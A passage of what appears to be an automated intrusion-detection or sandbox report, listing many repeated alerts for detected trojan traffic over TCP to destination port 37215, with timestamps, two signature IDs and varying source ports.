          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175031
          SID:2835222
          Source Port:57790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.127191
          SID:2829579
          Source Port:38128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.131715
          SID:2835222
          Source Port:51284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.271320
          SID:2829579
          Source Port:39238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.897066
          SID:2829579
          Source Port:59698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.798964
          SID:2829579
          Source Port:34488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353033
          SID:2835222
          Source Port:55650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.087541
          SID:2829579
          Source Port:60622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.395319
          SID:2835222
          Source Port:50942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.888647
          SID:2835222
          Source Port:43158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.352509
          SID:2835222
          Source Port:51588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.237041
          SID:2835222
          Source Port:60692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.887621
          SID:2829579
          Source Port:34660
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.150686
          SID:2835222
          Source Port:48914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.306311
          SID:2829579
          Source Port:56090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.466624
          SID:2835222
          Source Port:33458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.860783
          SID:2835222
          Source Port:33008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.896479
          SID:2835222
          Source Port:44836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.819019
          SID:2829579
          Source Port:47492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512759
          SID:2829579
          Source Port:53012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.037025
          SID:2835222
          Source Port:48556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.860214
          SID:2829579
          Source Port:45524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.266288
          SID:2835222
          Source Port:51590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159232
          SID:2835222
          Source Port:41756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.176467
          SID:2835222
          Source Port:51560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.463089
          SID:2829579
          Source Port:44382
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.746206
          SID:2835222
          Source Port:33744
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.269290
          SID:2835222
          Source Port:60574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.745597
          SID:2835222
          Source Port:42962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.017310
          SID:2835222
          Source Port:46354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.800600
          SID:2835222
          Source Port:46346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512490
          SID:2829579
          Source Port:33258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.601347
          SID:2835222
          Source Port:33490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912601
          SID:2829579
          Source Port:50830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.136243
          SID:2835222
          Source Port:54948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740411
          SID:2829579
          Source Port:54640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.178469
          SID:2835222
          Source Port:48654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.781585
          SID:2829579
          Source Port:34644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.165657
          SID:2835222
          Source Port:58858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.460693
          SID:2835222
          Source Port:58534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.463415
          SID:2829579
          Source Port:59878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.554279
          SID:2835222
          Source Port:45340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732002
          SID:2835222
          Source Port:53896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.784292
          SID:2835222
          Source Port:37668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.847108
          SID:2829579
          Source Port:55182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.884488
          SID:2829579
          Source Port:33402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.781333
          SID:2829579
          Source Port:37536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.812649
          SID:2835222
          Source Port:37490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.747055
          SID:2829579
          Source Port:50562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.406851
          SID:2835222
          Source Port:37084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.126567
          SID:2829579
          Source Port:33970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.601442
          SID:2829579
          Source Port:42986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.795386
          SID:2835222
          Source Port:39434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.800885
          SID:2829579
          Source Port:60972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.732384
          SID:2835222
          Source Port:49758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274227
          SID:2829579
          Source Port:46222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732064
          SID:2835222
          Source Port:38982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.663833
          SID:2835222
          Source Port:35574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352591
          SID:2835222
          Source Port:54678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.236889
          SID:2835222
          Source Port:33062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.734551
          SID:2829579
          Source Port:55252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.548201
          SID:2829579
          Source Port:38462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.783052
          SID:2829579
          Source Port:36148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177705
          SID:2829579
          Source Port:60234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.792817
          SID:2835222
          Source Port:53568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.892352
          SID:2829579
          Source Port:54628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.792570
          SID:2835222
          Source Port:58710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.709523
          SID:2829579
          Source Port:42612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.267764
          SID:2835222
          Source Port:40506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.740375
          SID:2829579
          Source Port:36426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.514456
          SID:2829579
          Source Port:55546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.078894
          SID:2835222
          Source Port:35274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449316
          SID:2835222
          Source Port:45324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.016037
          SID:2835222
          Source Port:36618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.456041
          SID:2829579
          Source Port:60814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.547990
          SID:2835222
          Source Port:57736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.672787
          SID:2829579
          Source Port:60718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.881250
          SID:2835222
          Source Port:40678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.844476
          SID:2835222
          Source Port:47664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670205
          SID:2829579
          Source Port:49328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.600869
          SID:2835222
          Source Port:54704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.005532
          SID:2835222
          Source Port:54788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.707466
          SID:2835222
          Source Port:45880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.175717
          SID:2829579
          Source Port:44690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155653
          SID:2829579
          Source Port:54634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274707
          SID:2835222
          Source Port:55910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.466364
          SID:2829579
          Source Port:58986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.087434
          SID:2835222
          Source Port:33882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743574
          SID:2835222
          Source Port:48836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.059352
          SID:2829579
          Source Port:38592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.447193
          SID:2829579
          Source Port:56652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462963
          SID:2835222
          Source Port:54372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.126947
          SID:2829579
          Source Port:49464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159912
          SID:2829579
          Source Port:51854
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741463
          SID:2829579
          Source Port:43404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.734602
          SID:2829579
          Source Port:45042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.896051
          SID:2829579
          Source Port:37338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.742073
          SID:2835222
          Source Port:41240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.884212
          SID:2829579
          Source Port:51986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.448836
          SID:2835222
          Source Port:48288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.261114
          SID:2835222
          Source Port:56954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356708
          SID:2829579
          Source Port:56602
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.542555
          SID:2835222
          Source Port:56664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.734795
          SID:2835222
          Source Port:58258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.793108
          SID:2829579
          Source Port:44406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.184100
          SID:2835222
          Source Port:40740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705099
          SID:2829579
          Source Port:51200
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.180720
          SID:2829579
          Source Port:36350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.243021
          SID:2835222
          Source Port:40868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741927
          SID:2829579
          Source Port:42046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.744370
          SID:2835222
          Source Port:49178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.857180
          SID:2829579
          Source Port:43218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.261081
          SID:2829579
          Source Port:57628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.077211
          SID:2835222
          Source Port:59622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.674457
          SID:2835222
          Source Port:49294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.511363
          SID:2835222
          Source Port:44020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670623
          SID:2835222
          Source Port:37962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.038275
          SID:2829579
          Source Port:35336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.884376
          SID:2835222
          Source Port:34908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.816471
          SID:2829579
          Source Port:42300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.165634
          SID:2835222
          Source Port:45870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.157546
          SID:2829579
          Source Port:40676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.746586
          SID:2835222
          Source Port:47786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.174170
          SID:2835222
          Source Port:47194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.796248
          SID:2835222
          Source Port:49134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.037138
          SID:2835222
          Source Port:51970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.110441
          SID:2835222
          Source Port:32802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.518446
          SID:2829579
          Source Port:46318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.837599
          SID:2829579
          Source Port:37246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.059624
          SID:2829579
          Source Port:42492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.667665
          SID:2835222
          Source Port:59688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.109103
          SID:2835222
          Source Port:36780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.116866
          SID:2829579
          Source Port:34412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.550864
          SID:2829579
          Source Port:56460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782754
          SID:2829579
          Source Port:35088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.468901
          SID:2835222
          Source Port:60652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.237213
          SID:2829579
          Source Port:50532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159525
          SID:2829579
          Source Port:39414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.511955
          SID:2835222
          Source Port:49366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.513900
          SID:2835222
          Source Port:54548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.548753
          SID:2835222
          Source Port:45652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.262474
          SID:2835222
          Source Port:45430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.896083
          SID:2835222
          Source Port:41386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.817465
          SID:2829579
          Source Port:36676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.780814
          SID:2829579
          Source Port:39584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.548222
          SID:2835222
          Source Port:52530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.470481
          SID:2835222
          Source Port:59822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.893378
          SID:2829579
          Source Port:43634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.837544
          SID:2829579
          Source Port:48832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.496112
          SID:2829579
          Source Port:59350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.741854
          SID:2835222
          Source Port:37672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.099474
          SID:2835222
          Source Port:46096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.471275
          SID:2829579
          Source Port:46554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.409455
          SID:2829579
          Source Port:53722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239121
          SID:2829579
          Source Port:43586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.542741
          SID:2829579
          Source Port:60570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.136065
          SID:2829579
          Source Port:46140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.466845
          SID:2829579
          Source Port:54608
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.299547
          SID:2829579
          Source Port:35076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.816808
          SID:2829579
          Source Port:49084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274799
          SID:2835222
          Source Port:59560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.175912
          SID:2835222
          Source Port:48974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353655
          SID:2829579
          Source Port:36588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.792757
          SID:2829579
          Source Port:60852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.410949
          SID:2835222
          Source Port:50336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.883832
          SID:2835222
          Source Port:52186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.518026
          SID:2829579
          Source Port:60134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.269949
          SID:2835222
          Source Port:40798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.829370
          SID:2835222
          Source Port:53440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.127910
          SID:2835222
          Source Port:43974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241148
          SID:2829579
          Source Port:56896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.548518
          SID:2829579
          Source Port:60548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.266117
          SID:2829579
          Source Port:44550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.749127
          SID:2835222
          Source Port:36442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782499
          SID:2829579
          Source Port:41452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.744405
          SID:2829579
          Source Port:56270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.180663
          SID:2829579
          Source Port:57652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.808008
          SID:2829579
          Source Port:46948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161366
          SID:2829579
          Source Port:34160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512139
          SID:2835222
          Source Port:46872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.155962
          SID:2829579
          Source Port:57304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.259986
          SID:2829579
          Source Port:36772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.237906
          SID:2829579
          Source Port:34348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.802573
          SID:2835222
          Source Port:55898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.603132
          SID:2829579
          Source Port:34396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.412726
          SID:2829579
          Source Port:36102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465288
          SID:2829579
          Source Port:37212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.269880
          SID:2829579
          Source Port:49036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.270922
          SID:2835222
          Source Port:54584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.406566
          SID:2835222
          Source Port:51364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.601443
          SID:2829579
          Source Port:39662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.550873
          SID:2835222
          Source Port:49262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.026082
          SID:2829579
          Source Port:60356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.174355
          SID:2835222
          Source Port:46900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.036589
          SID:2835222
          Source Port:44352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.806754
          SID:2829579
          Source Port:36806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.131245
          SID:2835222
          Source Port:57934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
